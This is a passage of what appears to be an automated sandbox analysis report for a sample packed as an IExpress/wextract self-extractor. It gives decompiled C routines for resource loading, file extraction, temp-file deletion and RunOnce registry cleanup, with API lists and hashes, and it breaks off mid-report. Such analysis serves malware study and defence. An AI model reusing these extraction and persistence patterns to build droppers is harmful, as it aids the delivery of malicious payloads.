                                                                        				_t28 = LocalAlloc(0x40, _t1);
                                                                        				if(_t28 != 0) {
                                                                        					if(E00A3468F("UPROMPT", _t28, _t29) != 0) {
                                                                        						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                        						if(_t5 != 0) {
                                                                        							_t6 = E00A344B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                        							LocalFree(_t28);
                                                                        							if(_t6 != 6) {
                                                                        								 *0xa39124 = 0x800704c7;
                                                                        								L10:
                                                                        								return 0;
                                                                        							}
                                                                        							 *0xa39124 = 0;
                                                                        							L6:
                                                                        							return 1;
                                                                        						}
                                                                        						LocalFree(_t28);
                                                                        						goto L6;
                                                                        					}
                                                                        					E00A344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        					LocalFree(_t28);
                                                                        					 *0xa39124 = 0x80070714;
                                                                        					goto L10;
                                                                        				}
                                                                        				E00A344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        				 *0xa39124 = E00A36285();
                                                                        				goto L10;
                                                                        			}







                                                                        APIs
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346A0
                                                                          • Part of subcall function 00A3468F: SizeofResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346A9
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346C3
                                                                          • Part of subcall function 00A3468F: LoadResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346CC
                                                                          • Part of subcall function 00A3468F: LockResource.KERNEL32(00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346D3
                                                                          • Part of subcall function 00A3468F: memcpy_s.MSVCRT ref: 00A346E5
                                                                          • Part of subcall function 00A3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346EF
                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A32F4D,?,00000002,00000000), ref: 00A35201
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A35250
                                                                          • Part of subcall function 00A344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A34518
                                                                          • Part of subcall function 00A344B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00A34554
                                                                          • Part of subcall function 00A36285: GetLastError.KERNEL32(00A35BBC), ref: 00A36285
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                        • String ID: <None>$UPROMPT
                                                                        • API String ID: 957408736-2980973527
                                                                        • Opcode ID: 13919e0bd3ae0018a0c5ebb719f71c76a682e71fd73d2ed6faf555021a5bd5a6
                                                                        • Instruction ID: 43024a5d285444d10b0369173e3c94a7e712272baea363613710f77f4df18ecb
                                                                        • Opcode Fuzzy Hash: 13919e0bd3ae0018a0c5ebb719f71c76a682e71fd73d2ed6faf555021a5bd5a6
                                                                        • Instruction Fuzzy Hash: DD11C4B1A00601BFE354ABF55D4AFBB61ADEB99380F104439F682E6190DBB9DC025624
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 74%
                                                                        			E00A352B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				signed int _t9;
                                                                        				signed int _t11;
                                                                        				void* _t21;
                                                                        				void* _t29;
                                                                        				CHAR** _t31;
                                                                        				void* _t32;
                                                                        				signed int _t33;
                                                                        
                                                                        				_t28 = __edi;
                                                                        				_t22 = __ecx;
                                                                        				_t21 = __ebx;
                                                                        				_t9 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t9 ^ _t33;
                                                                        				_push(__esi);
                                                                        				_t31 =  *0xa391e0; // 0x2b99198
                                                                        				if(_t31 != 0) {
                                                                        					_push(__edi);
                                                                        					do {
                                                                        						_t29 = _t31;
                                                                        						if( *0xa38a24 == 0 &&  *0xa39a30 == 0) {
                                                                        							SetFileAttributesA( *_t31, 0x80); // executed
                                                                        							DeleteFileA( *_t31); // executed
                                                                        						}
                                                                        						_t31 = _t31[1];
                                                                        						LocalFree( *_t29);
                                                                        						LocalFree(_t29);
                                                                        					} while (_t31 != 0);
                                                                        					_pop(_t28);
                                                                        				}
                                                                        				_t11 =  *0xa38a20; // 0x0
                                                                        				_pop(_t32);
                                                                        				if(_t11 != 0 &&  *0xa38a24 == 0 &&  *0xa39a30 == 0) {
                                                                        					_push(_t22);
                                                                        					E00A31781( &_v268, 0x104, _t22, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\");
                                                                        					if(( *0xa39a34 & 0x00000020) != 0) {
                                                                        						E00A365E8( &_v268);
                                                                        					}
                                                                        					SetCurrentDirectoryA(".."); // executed
                                                                        					_t22 =  &_v268;
                                                                        					E00A32390( &_v268);
                                                                        					_t11 =  *0xa38a20; // 0x0
                                                                        				}
                                                                        				if( *0xa39a40 != 1 && _t11 != 0) {
                                                                        					_t11 = E00A31FE1(_t22); // executed
                                                                        				}
                                                                        				 *0xa38a20 =  *0xa38a20 & 0x00000000;
                                                                        				return E00A36CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                        			}













                                                                        APIs
                                                                        • SetFileAttributesA.KERNELBASE(02B99198,00000080,?,00000000), ref: 00A352F2
                                                                        • DeleteFileA.KERNELBASE(02B99198), ref: 00A352FA
                                                                        • LocalFree.KERNEL32(02B99198,?,00000000), ref: 00A35305
                                                                        • LocalFree.KERNEL32(02B99198), ref: 00A3530C
                                                                        • SetCurrentDirectoryA.KERNELBASE(00A311FC,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 00A35363
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\, xrefs: 00A35334
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                        • API String ID: 2833751637-1955631000
                                                                        • Opcode ID: f4e21fd85950cd3044cdabe494a6f9973adfa8ec9529fba4a931a6a918a6ade7
                                                                        • Instruction ID: 79b550be181c1b18e8b1bb75bf3c907736db71d2f668e934ee2d54f3120ebe16
                                                                        • Opcode Fuzzy Hash: f4e21fd85950cd3044cdabe494a6f9973adfa8ec9529fba4a931a6a918a6ade7
                                                                        • Instruction Fuzzy Hash: 9B21C031D00614DBDB24EBA8ED59BAA77B4BB10790F04025AF8825B1A0CFF49D86DB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A31FE1(void* __ecx) {
                                                                        				void* _v8;
                                                                        				long _t4;
                                                                        				long _t7;
                                                                        
                                                                        				if( *0xa38530 != 0) {
                                                                        					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                        					if(_t4 == 0) {
                                                                        						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                                                                        						_t7 = RegCloseKey(_v8); // executed
                                                                        						return _t7;
                                                                        					}
                                                                        				}
                                                                        				return _t4;
                                                                        			}







                                                                        APIs
                                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00A3538C,?,?,00A3538C), ref: 00A32005
                                                                        • RegDeleteValueA.KERNELBASE(00A3538C,wextract_cleanup0,?,?,00A3538C), ref: 00A32017
                                                                        • RegCloseKey.KERNELBASE(00A3538C,?,?,00A3538C), ref: 00A32020
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CloseDeleteOpenValue
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                        • API String ID: 849931509-702805525
                                                                        • Opcode ID: 10747b7ffa26ddbfc68813ddcf8283197cf59c836f88a5c09358e90737e0de0a
                                                                        • Instruction ID: 78a3333cc071edb78e823d8e76457d1640b0a656b476cf267df603b55302b290
                                                                        • Opcode Fuzzy Hash: 10747b7ffa26ddbfc68813ddcf8283197cf59c836f88a5c09358e90737e0de0a
                                                                        • Instruction Fuzzy Hash: 98E08631650328BBD729CFD0FD4AF5DBB29F712741F100194F945A00A0EBB55E15D705
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A347E0(intOrPtr* __ecx) {
                                                                        				void* _t5;
                                                                        				intOrPtr _t6;
                                                                        				intOrPtr _t9;
                                                                        				void* _t11;
                                                                        				void* _t19;
                                                                        				intOrPtr* _t22;
                                                                        				void _t24;
                                                                        				struct HWND__* _t25;
                                                                        				struct HWND__* _t26;
                                                                        				void* _t27;
                                                                        				intOrPtr* _t28;
                                                                        				intOrPtr* _t33;
                                                                        				void* _t34;
                                                                        
                                                                        				_t33 = __ecx; // executed
                                                                        				_t5 = LocalAlloc(0x40, 8); // executed
                                                                        				_t34 = _t5;
                                                                        				if(_t34 != 0) {
                                                                        					_t22 = _t33;
                                                                        					_t27 = _t22 + 1;
                                                                        					do {
                                                                        						_t6 =  *_t22;
                                                                        						_t22 = _t22 + 1;
                                                                        					} while (_t6 != 0);
                                                                        					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                        					 *_t34 = _t24;
                                                                        					if(_t24 != 0) {
                                                                        						_t28 = _t33;
                                                                        						_t19 = _t28 + 1;
                                                                        						do {
                                                                        							_t9 =  *_t28;
                                                                        							_t28 = _t28 + 1;
                                                                        						} while (_t9 != 0);
                                                                        						E00A31680(_t24, _t28 - _t19 + 1, _t33);
                                                                        						_t11 =  *0xa391e0; // 0x2b99198
                                                                        						 *(_t34 + 4) = _t11;
                                                                        						 *0xa391e0 = _t34;
                                                                        						return 1;
                                                                        					}
                                                                        					_t25 =  *0xa38584; // 0x0
                                                                        					E00A344B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                        					LocalFree(_t34);
                                                                        					L2:
                                                                        					return 0;
                                                                        				}
                                                                        				_t26 =  *0xa38584; // 0x0
                                                                        				E00A344B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                        				goto L2;
                                                                        			}

















                                                                        APIs
                                                                        • LocalAlloc.KERNELBASE(00000040,00000008,?,00000000,00A34E6F), ref: 00A347EA
                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00A34823
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00A34847
                                                                          • Part of subcall function 00A344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A34518
                                                                          • Part of subcall function 00A344B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00A34554
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\, xrefs: 00A34851
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Local$Alloc$FreeLoadMessageString
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                        • API String ID: 359063898-1955631000
                                                                        • Opcode ID: 30786d712d3df3820f0db79b300dfdf67cd494825e7d6890eb59f235dae444d3
                                                                        • Instruction ID: 5b2b88394632026a9824392fd5d6eb6e704808561e5dafebad49555437ed6c1f
                                                                        • Opcode Fuzzy Hash: 30786d712d3df3820f0db79b300dfdf67cd494825e7d6890eb59f235dae444d3
                                                                        • Instruction Fuzzy Hash: BE11E5756047416FD754DF749C18F777B6AEB89300F048519FA829B341DA35EC078760
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00A34CD0(char* __edx, long _a4, int _a8) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t29;
                                                                        				int _t30;
                                                                        				long _t32;
                                                                        				signed int _t33;
                                                                        				long _t35;
                                                                        				long _t36;
                                                                        				struct HWND__* _t37;
                                                                        				long _t38;
                                                                        				long _t39;
                                                                        				long _t41;
                                                                        				long _t44;
                                                                        				long _t45;
                                                                        				long _t46;
                                                                        				signed int _t50;
                                                                        				long _t51;
                                                                        				char* _t58;
                                                                        				long _t59;
                                                                        				char* _t63;
                                                                        				long _t64;
                                                                        				CHAR* _t71;
                                                                        				CHAR* _t74;
                                                                        				int _t75;
                                                                        				signed int _t76;
                                                                        
                                                                        				_t69 = __edx;
                                                                        				_t29 =  *0xa38004; // 0xb6b6972c
                                                                        				_t30 = _t29 ^ _t76;
                                                                        				_v8 = _t30;
                                                                        				_t75 = _a8;
                                                                        				if( *0xa391d8 == 0) {
                                                                        					_t32 = _a4;
                                                                        					__eflags = _t32;
                                                                        					if(_t32 == 0) {
                                                                        						_t33 = E00A34E99(_t75);
                                                                        						L35:
                                                                        						return E00A36CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                        					}
                                                                        					_t35 = _t32 - 1;
                                                                        					__eflags = _t35;
                                                                        					if(_t35 == 0) {
                                                                        						L9:
                                                                        						_t33 = 0;
                                                                        						goto L35;
                                                                        					}
                                                                        					_t36 = _t35 - 1;
                                                                        					__eflags = _t36;
                                                                        					if(_t36 == 0) {
                                                                        						_t37 =  *0xa38584; // 0x0
                                                                        						__eflags = _t37;
                                                                        						if(_t37 != 0) {
                                                                        							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                        						}
                                                                        						_t54 = 0xa391e4;
                                                                        						_t58 = 0xa391e4;
                                                                        						do {
                                                                        							_t38 =  *_t58;
                                                                        							_t58 =  &(_t58[1]);
                                                                        							__eflags = _t38;
                                                                        						} while (_t38 != 0);
                                                                        						_t59 = _t58 - 0xa391e5;
                                                                        						__eflags = _t59;
                                                                        						_t71 =  *(_t75 + 4);
                                                                        						_t73 =  &(_t71[1]);
                                                                        						do {
                                                                        							_t39 =  *_t71;
                                                                        							_t71 =  &(_t71[1]);
                                                                        							__eflags = _t39;
                                                                        						} while (_t39 != 0);
                                                                        						_t69 = _t71 - _t73;
                                                                        						_t30 = _t59 + 1 + _t71 - _t73;
                                                                        						__eflags = _t30 - 0x104;
                                                                        						if(_t30 >= 0x104) {
                                                                        							L3:
                                                                        							_t33 = _t30 | 0xffffffff;
                                                                        							goto L35;
                                                                        						}
                                                                        						_t69 = 0xa391e4;
                                                                        						_t30 = E00A34702( &_v268, 0xa391e4,  *(_t75 + 4));
                                                                        						__eflags = _t30;
                                                                        						if(__eflags == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t41 = E00A3476D( &_v268, __eflags);
                                                                        						__eflags = _t41;
                                                                        						if(_t41 == 0) {
                                                                        							goto L9;
                                                                        						}
                                                                        						_push(0x180);
                                                                        						_t30 = E00A34980( &_v268, 0x8302); // executed
                                                                        						_t75 = _t30;
                                                                        						__eflags = _t75 - 0xffffffff;
                                                                        						if(_t75 == 0xffffffff) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t30 = E00A347E0( &_v268);
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						 *0xa393f4 =  *0xa393f4 + 1;
                                                                        						_t33 = _t75;
                                                                        						goto L35;
                                                                        					}
                                                                        					_t44 = _t36 - 1;
                                                                        					__eflags = _t44;
                                                                        					if(_t44 == 0) {
                                                                        						_t54 = 0xa391e4;
                                                                        						_t63 = 0xa391e4;
                                                                        						do {
                                                                        							_t45 =  *_t63;
                                                                        							_t63 =  &(_t63[1]);
                                                                        							__eflags = _t45;
                                                                        						} while (_t45 != 0);
                                                                        						_t74 =  *(_t75 + 4);
                                                                        						_t64 = _t63 - 0xa391e5;
                                                                        						__eflags = _t64;
                                                                        						_t69 =  &(_t74[1]);
                                                                        						do {
                                                                        							_t46 =  *_t74;
                                                                        							_t74 =  &(_t74[1]);
                                                                        							__eflags = _t46;
                                                                        						} while (_t46 != 0);
                                                                        						_t73 = _t74 - _t69;
                                                                        						_t30 = _t64 + 1 + _t74 - _t69;
                                                                        						__eflags = _t30 - 0x104;
                                                                        						if(_t30 >= 0x104) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t69 = 0xa391e4;
                                                                        						_t30 = E00A34702( &_v268, 0xa391e4,  *(_t75 + 4));
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                        						_t30 = E00A34C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						E00A34B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                        						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                        						__eflags = _t50;
                                                                        						if(_t50 != 0) {
                                                                        							_t51 = _t50 & 0x00000027;
                                                                        							__eflags = _t51;
                                                                        						} else {
                                                                        							_t51 = 0x80;
                                                                        						}
                                                                        						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						} else {
                                                                        							_t33 = 1;
                                                                        							goto L35;
                                                                        						}
                                                                        					}
                                                                        					_t30 = _t44 - 1;
                                                                        					__eflags = _t30;
                                                                        					if(_t30 == 0) {
                                                                        						goto L3;
                                                                        					}
                                                                        					goto L9;
                                                                        				}
                                                                        				if(_a4 == 3) {
                                                                        					_t30 = E00A34B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                        				}
                                                                        				goto L3;
                                                                        			}

                                                                        APIs
                                                                        • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00A34DB5
                                                                        • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00A34DDD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFileItemText
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                        • API String ID: 3625706803-1955631000
                                                                        • Opcode ID: 8f4992df8ed82c7b567f136e6c77c0bd022d4e3be7ade3c01332827e9c79869e
                                                                        • Instruction ID: 21c6aa3406c905c17654ec57b9030c88ea6df662aafad7480162875ca539d8e9
                                                                        • Opcode Fuzzy Hash: 8f4992df8ed82c7b567f136e6c77c0bd022d4e3be7ade3c01332827e9c79869e
                                                                        • Instruction Fuzzy Hash: CB4134362002019BCB259F38DE446F6B7A5FB4D780F148668F88297695DF31FE8AC750
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A34C37(signed int __ecx, int __edx, int _a4) {
                                                                        				struct _FILETIME _v12;
                                                                        				struct _FILETIME _v20;
                                                                        				FILETIME* _t14;
                                                                        				int _t15;
                                                                        				signed int _t21;
                                                                        
                                                                        				_t21 = __ecx * 0x18;
                                                                        				if( *((intOrPtr*)(_t21 + 0xa38d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                        					L5:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t14 =  &_v12;
                                                                        					_t15 = SetFileTime( *(_t21 + 0xa38d74), _t14, _t14, _t14); // executed
                                                                        					if(_t15 == 0) {
                                                                        						goto L5;
                                                                        					}
                                                                        					return 1;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00A34C54
                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A34C66
                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00A34C7E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Time$File$DateLocal
                                                                        • String ID:
                                                                        • API String ID: 2071732420-0
                                                                        • Opcode ID: 1584af4d48858c2f2b8909357e301084db43df6e761b5d45d7143f0c201544e9
                                                                        • Instruction ID: 112f697370d9128401cf0cd93ce58b7db0fbbdec97dd125768706a4dbe60da80
                                                                        • Opcode Fuzzy Hash: 1584af4d48858c2f2b8909357e301084db43df6e761b5d45d7143f0c201544e9
                                                                        • Instruction Fuzzy Hash: 2AF0907260121CAF9B64DFB4CC49DBBB7BCEB18240B44052AB855C1050EA30E914D7A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E00A3487A(CHAR* __ecx, signed int __edx) {
                                                                        				void* _t7;
                                                                        				CHAR* _t11;
                                                                        				long _t18;
                                                                        				long _t23;
                                                                        
                                                                        				_t11 = __ecx;
                                                                        				asm("sbb edi, edi");
                                                                        				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                        				if((__edx & 0x00000100) == 0) {
                                                                        					asm("sbb esi, esi");
                                                                        					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                        				} else {
                                                                        					if((__edx & 0x00000400) == 0) {
                                                                        						asm("sbb esi, esi");
                                                                        						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                        					} else {
                                                                        						_t23 = 1;
                                                                        					}
                                                                        				}
                                                                        				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                        				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                        					return _t7;
                                                                        				} else {
                                                                        					E00A3490C(_t11);
                                                                        					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                        				}
                                                                        			}








                                                                        APIs
                                                                        • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00A34A23,?,00A34F67,*MEMCAB,00008000,00000180), ref: 00A348DE
                                                                        • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00A34F67,*MEMCAB,00008000,00000180), ref: 00A34902
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 2cadfed00c3c848edd79466b6fec4fab58c107dd3e9fbec9e07fd4193047e769
                                                                        • Instruction ID: aeb856c2fc61e3a9bc25067aa9179872beace703b199420e26dfc40ef8775f7d
                                                                        • Opcode Fuzzy Hash: 2cadfed00c3c848edd79466b6fec4fab58c107dd3e9fbec9e07fd4193047e769
                                                                        • Instruction Fuzzy Hash: E1016DA3E1167026F32481694C88FB7955CCBDA734F1B0334BDEAE71D1D5646C0481E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00A34AD0(signed int _a4, void* _a8, long _a12) {
                                                                        				signed int _t9;
                                                                        				int _t12;
                                                                        				signed int _t14;
                                                                        				signed int _t15;
                                                                        				void* _t20;
                                                                        				struct HWND__* _t21;
                                                                        				signed int _t24;
                                                                        				signed int _t25;
                                                                        
                                                                        				_t20 =  *0xa3858c; // 0x268
                                                                        				_t9 = E00A33680(_t20);
                                                                        				if( *0xa391d8 == 0) {
                                                                        					_push(_t24);
                                                                        					_t12 = WriteFile( *(0xa38d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                        					if(_t12 != 0) {
                                                                        						_t25 = _a12;
                                                                        						if(_t25 != 0xffffffff) {
                                                                        							_t14 =  *0xa39400; // 0x9ba00
                                                                        							_t15 = _t14 + _t25;
                                                                        							 *0xa39400 = _t15;
                                                                        							if( *0xa38184 != 0) {
                                                                        								_t21 =  *0xa38584; // 0x0
                                                                        								if(_t21 != 0) {
                                                                        									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xa393f8, 0);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t25 = _t24 | 0xffffffff;
                                                                        					}
                                                                        					return _t25;
                                                                        				} else {
                                                                        					return _t9 | 0xffffffff;
                                                                        				}
                                                                        			}












                                                                        APIs
                                                                          • Part of subcall function 00A33680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A3369F
                                                                          • Part of subcall function 00A33680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A336B2
                                                                          • Part of subcall function 00A33680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A336DA
                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00A34B05
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
